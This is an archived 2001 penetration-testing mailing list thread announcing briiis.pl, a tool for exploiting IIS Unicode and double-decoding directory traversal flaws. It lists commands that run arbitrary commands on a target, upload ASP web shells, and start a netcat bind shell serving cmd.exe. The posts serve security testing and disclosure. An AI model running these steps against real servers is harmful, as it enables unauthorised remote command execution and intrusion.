Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

pen-test logo Penetration Testing mailing list archives

RE: iXsecurity.tool.briiis.3.02
From: "Colby Rice" <crice () 180096hotel com>
Date: Wed, 13 Jun 2001 16:18:58 -0500
It should be noted that this windows 2k (workstation server etc...) with
SP2 is exploitable using the '/' decoding vulnerability. (Im sure this
was noted at some point) It should also be noted that my test machines
have all the latest patches applied from microsoft. Anyhow.. I would
like to thank 
the people at ixsecurity (Ian Vitek) for this application as it proved a
point to a co-worker for me. :> 
                Cheers
                        CR

-----Original Message-----
From: ian.vitek () ixsecurity com [mailto:ian.vitek () ixsecurity com]
Sent: Wednesday, June 13, 2001 7:14 AM
To: pen-test () securityfocus com
Cc: Hackers
Subject: iXsecurity.tool.briiis.3.02





-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iXsecurity Security Tool Release
briiis.pl v3.02
================

Tool Description
- - ------------
Briiis is a tool for testing web servers for "/" encoding
break out from web root vulnerability from an executable
directory.
E.g. IIS Unicode and double encoding vulnerabilities.

Special features
- - ------------
* Tests a lot of commonly executable directories if any
  of these directories is on the same disk as
  C:\WINNT\SYSTEM32\CMD.EXE
  Very easy to add even more directories
* Caches the found directory
* SSL support with SSLeay (Unix)
* Easy to use text file upload
* Easy to use / encoding option
* Relative path name program execution
* Virtual host support

When to use briiis
- - --------------
Briiis should be used to test the IIS unicode or the IIS
superfluous decoding vulnerability. Briiis can also be
used to check for other "/" unicode or "/" decoding
vulnerabilities where the goal is to break out from the
web root from an executable directory to access CMD.EXE.

How to use briiis
- - -------------
Test a server for the unicode vulnerability with the
command:
briiis.pl -s server

Test the decoding vulnerability:
briiis.pl -s server -F %255c

Copy CMD.EXE to the web executable directory
(Used for running commands and uploading files)
briiis.pl -s server -x

Run commands
briiis.pl -s server -C "dir /a"

Upload an ASP script to the executable directory
(Like cmdasp.asp and upload.asp)
briiis.pl -s server -u upload.asp

Other options
- - ---------
The virtual host option, -H, is used when multiple web
servers are bound to same IP and PORT. One case is for
example reverse proxying.
The standard "-s www.server.dom" sets the "Host:" header to:
Host: www.server.dom
If other virtual servers needs to be tested run:
briiis.pl -s www.server.dom -H www.server2.dom

Briiis creates a cache file named "<program_name>.cache".
Delete the cache file if you want to run a new test after
patching the server.

The binary file upload does not work due to lack of
privileges. If you want to test it:
* Copy NC.EXE or something to NC.BIN
* briiis.pl -s server -U NC.BIN -d -l c:\
* There is now a NC.SCR, debug script, in c:\
* With cmdasp.asp run
  debug < nc.scr
* Start NC.BIN with cmdasp.asp
  c:\nc.bin -l -p 7171 -n -v -e cmd.exe
The binary upload function can only handle small files.
Use upload.asp or TFTP when uploading larger files.

Background and more information
- - ---------------------------
Unicode vulnerability information:
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
Superfluous Decoding Vulnerability information:
http://www.microsoft.com/technet/security/bulletin/MS01-026.asp

TODO
- -
* Graphical interface (Planned Q4 2002)
* Basic Authentication (Planned Q3 2001)

- - ------------------------------------------------

Ian Vitek, mailto:ian.vitek () ixsecurity com

- - ------------------------------------------------

iXsecurity (former Infosec) is a Swedish and United
Kingdom based tigerteam that have worked with computer-
related security since 1982 and done technical security
audits (pentests) since 1995.
iXsecurity welcomes all new co-workers in Sweden
and United Kingdom.

- - ------------------------------------------------


-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.1

iQA/AwUBOydnKY118uy6FU2iEQJttQCgvv2p/eLwoATBCHJwFGyglqTQg90An1jV
WnyLpKEcIdhaDfeNKALz2rNG
=FhpF
-----END PGP SIGNATURE-----

Briiis.pl
=========

(See attached file: briiis.pl)

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]